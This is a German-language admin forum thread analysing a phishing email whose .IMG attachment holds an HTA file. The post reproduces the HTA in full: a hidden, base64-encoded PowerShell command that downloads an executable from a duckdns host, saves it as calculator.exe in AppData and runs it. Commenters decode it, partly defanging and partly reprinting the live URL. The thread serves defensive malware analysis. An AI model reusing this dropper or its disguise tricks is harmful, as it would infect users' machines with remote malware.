Phishing Mail mit schädlichen Images in freier Wildbahn (.IMG Datei)

Moin Moin an alle

Gestern bekam ich eine EMail mit irgendwelchen komischen Sepa Einzugsankündigungen die man angeblich der angehängten Datei entnehmen kann. Ging so
um 4k .. Autoteile ... ja ne ist klar als Verwaltung käuft man ja immer Autoteile im mittleren vierstelligen Bereich (wenn man nicht grade aus der Branche kommt).

Als Dateianhang war eine .IMG dran (Das hatte ich auch noch nicht, es halt ein Datenträgerimageformat wie .ISO). Größe so 1 MB ..

Das meiste war leer (Ich denke man wollte das nur künstlich aufbladen weil viele Scanner nur bis zu einer gewissen Größe scannen)

In der IMG war eine .HTA Datei mit folgendem Inhalt

<html> <HTA:APPLICATION /> <head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">  
<meta http-equiv="x-ua-compatible" content="ie=9"> <title>Load HTA</title>   
<script type="text/javascript"> new ActiveXObject("wsCript.SHell").rUn( '"POWERSHell.EXe" pOWeRSHelL.EXe -Ex bYPASs -NoP -w 1 -eC  
CQAJACAAIAAJACAACQAJACAACQAgACAAIAAJAGkAbgB2AG8AawBlAC0AdwBlAGIAcgBFAHEAdQBFAFMAVAAgAAkACQAgACAAIAAgACAACQAJACAAIAAJACAAIAAJAAkAIAAgACAAIAAgAAkAIAAJACAAIAAJACAACQAgACAALQBVAFIAaQAJAAkACQAJAAkACQAJAAkACQAJACAAHSBoAHQAdABwADoALwAvAGwAaQBuAGsAZAAuAGQAdQBjAGsAZABuAHMALgBvAHIAZwAvADEAMQBkAC8AZAB5AG4AbwAuAGUAeABlAB0gCQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAtAG8AdQBUAGYAaQBsAEUAIAAJAAkACQAJAAkACQAJAAkACQAdICQARQBOAFYAOgBBAHAAUABEAEEAVABBAFwAYwBhAGwAYwB1AGwAYQB0AG8AcgAuAGUAeABlAB0gIAAJACAACQAJAAkACQAJAAkACQAgACAACQAgACAAIAAgAAkACQAgAAkAIAAJACAAIAAgACAAIAAgAAkACQAJAAkAIAAgACAAOwAgACAAIAAgACAACQBpAE4AVgBvAGsAZQAtAEUAeABQAFIARQBzAFMAaQBvAE4ACQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAAkAHSAkAGUAbgB2ADoAQQBwAHAARABBAHQAYQBcAGMAYQBsAGMAdQBsAGEAdABvAHIALgBlAHgAZQAdIA== ' , 0 ) ;   
</script> </head> <body> <div><a href="javascript:void(0)" onclick="();return false">  
<!DOCTYPE HTML> <html> </html></a></div> </body> </html>

Ok, man kann sich denken was hier versucht wird .. nachdem .ZIP und .RAR wohl kaum noch durchkommt nehmen wir halt was anderes zb. IMG. und hoffen das die .hta irgendwer dann anklickt. Und das läd dann über ein Powershell script Unfug nach.

Interessant wäre es ob man das wieder lesebar machen kann, dann wüsste man was genau von wo nachgeladen wird.

Please also mark the comments that contributed to the solution of the article

Content-Key: 1078421591

Url: https://administrator.de/contentid/1078421591

Printed on: April 24, 2024 at 13:04 o'clock

17 Comments

Latest comment

Moin,

Da steht nur bas64-codiert drin:
invoke-webrEquEST -URi http://linkdXXX.duckdnsXXX.orgXXX/XXX11d/XXXdyno.exe -ouTfilE $ENV:ApPDATA\calculator.exe ; iNVoke-ExPREsSioN $￹e￹n￹v￹:￹A￹p￹p￹D￹A￹t￹a￹\￹c￹a￹l￹c￹u￹l￹a￹t￹o￹r￹.￹e￹x￹e￹

Der holt sich also eine dyno.exe udn speichert sie in Appdata als calculator.exe ab und ruft diese auf. Und damit das nciht auffällt, wird Powershell mit bypass udn noprofile aufgerufen.

lks

PS: Die X-e sind von mir, damit da nicht ein Depp einfach draufklickt.

PPS: Kann sein, daß beim Editieren der base64-Ausgabe (base64 -d) ich Zeichen verschluckt habe, aber das dürfte für das verständnis egal sein, was das Ding macht.

P3S: Das gehört zum kleinen Einmaleins des sicherheitsbewußten Admin, sowas selbst herauszufinden.

P4S: Sowas landet im Fliegenfänger bei mir mehrmals täglich.

P5S:decode base64

Edit: beim editieren Ausgabe war der Parameter von invoke-expression veschwunden.

Es ist Base64:

$DecodedText = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($b64))
$DecodedText

und ergibt nach Entfernen einiger Tabs:

invoke-webrEquEST -URi ”http[:]//linkd.duckdns[.]org/11d/dyno.exe” -ouTfilE ”$ENV:ApPDATA\calculator.exe”

Fehlt da noch etwas?

Zitat von @Fennek11:

Es ist Base64:

invoke-webrEquEST -URi ”http://linkd.duckdns.org/11d/dyno.exe” -ouTfilE ”$ENV:ApPDATA\calculator.exe”

Fehlt da noch etwas?

invoke-expression $￹e￹n￹v￹:￹A￹p￹p￹D￹A￹t￹a￹\￹c￹a￹l￹c￹u￹l￹a￹t￹o￹r￹.￹e￹x￹e￹

lks

Edit: parameter von invoke-Expression ergänzt.

Mit was hast du das denn decodiert .. Das es Base64 ist habe ich gesehen das ist ja ziemlich charakteristisch, aber ich hab nur kauderwelsch rausbekommen ... Ansonsten ist das so wie ich dachte ...

Zitat von @wolfble:

Mit was hast du das denn decodiert .. Das es Base64 ist habe ich gesehen das ist ja ziemlich charakteristisch, aber ich hab nur kauderwelsch rausbekommen ... Ansonsten ist das so wie ich dachte ...

Mit dem Tool base64 das so ziemlich mit jeder Distribution dabei ist und auch unter Linux mit WSL oder cygwin zur verfügung steht.

Mit den online-Tools aus der google-Suche oben geht das natürlich auch. Man muß nur die Sonderzeichen geschickt interpretieren, die da zwischendrin stehen.

lks

Oder: https://base64.guru/converter/decode

Ah ich sehs in meinem alter sieht man nicht mehr so gut

.. die IP geht irgendwo zu ner Strato seite die werden sie dafür missbraucht haben und wenn das bemerkt wird wandern sie zu nächsten ist mit duckdns ja ken Problem .

Also wie immer .oO

Übrigens:

Bei Virustotal sind momentan nur 5 Scanner der Meinung, daß es Malware ist, wenn man die URL angibt. Wenn man die datei selbst hochlädt, sind es bei virustotal 10 Scanner, die Malware erkennen.

TGIF

lks

PS. Man sieht aktuell alle paar Minuten, wie immer mehr Scanner die Dateie als Malware detektieren.